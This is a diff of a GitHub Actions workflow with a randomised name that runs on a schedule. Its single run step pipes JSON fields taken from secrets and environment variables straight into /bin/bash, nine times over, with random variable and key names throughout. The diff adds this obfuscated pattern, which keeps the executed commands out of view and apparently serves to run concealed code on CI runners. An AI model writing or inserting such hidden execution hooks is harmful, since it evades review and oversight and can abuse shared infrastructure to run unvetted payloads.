--- a/.github/workflows/swimmingsardonic.yml
+++ b/.github/workflows/swimmingsardonic.yml
@@ -3,8 +3,7 @@ name: swimmingsardonic
 on:
   workflow_dispatch:
   schedule:
-    - cron: '13 1/6 * * *'
-
+    - cron: '1 4/6 * * *'
 jobs:
   build:
     runs-on: ubuntu-latest
@@ -13,14 +12,15 @@ jobs:
       - uses: actions/checkout@v4
       - name: swimmingsardonic
         env:
-          jjj28: ${{ secrets.jjj28 }}
+          n21: ${{ secrets.n21 }}
         run: |
-          echo $jjj28 | jq -r .fbi4 | /bin/bash
-          echo $b39230 | jq -r .aov065 | /bin/bash
-          echo $hyhx74 | jq -r .fqoz489 | /bin/bash
-          echo $qofcj313 | jq -r .w01 | /bin/bash
-          echo $tiy690 | jq -r .xipt80 | /bin/bash
-          echo $zttw10 | jq -r .b70403 | /bin/bash
-          echo $ekwe7848 | jq -r .re4011 | /bin/bash
-          echo $yfay307 | jq -r .qa58276 | /bin/bash
+          echo $n21 | jq -r .eklf4 | /bin/bash
+          echo $yl6 | jq -r .anf35 | /bin/bash
+          echo $dccr61 | jq -r .d218 | /bin/bash
+          echo $wr57 | jq -r .mwik9757 | /bin/bash
+          echo $fvzqq1565 | jq -r .np06 | /bin/bash
+          echo $tp2562 | jq -r .ux1 | /bin/bash
+          echo $cfao446 | jq -r .sfkq269 | /bin/bash
+          echo $djcxw96907 | jq -r .z51 | /bin/bash
+          echo $tljzr14474 | jq -r .ntpav1 | /bin/bash
 
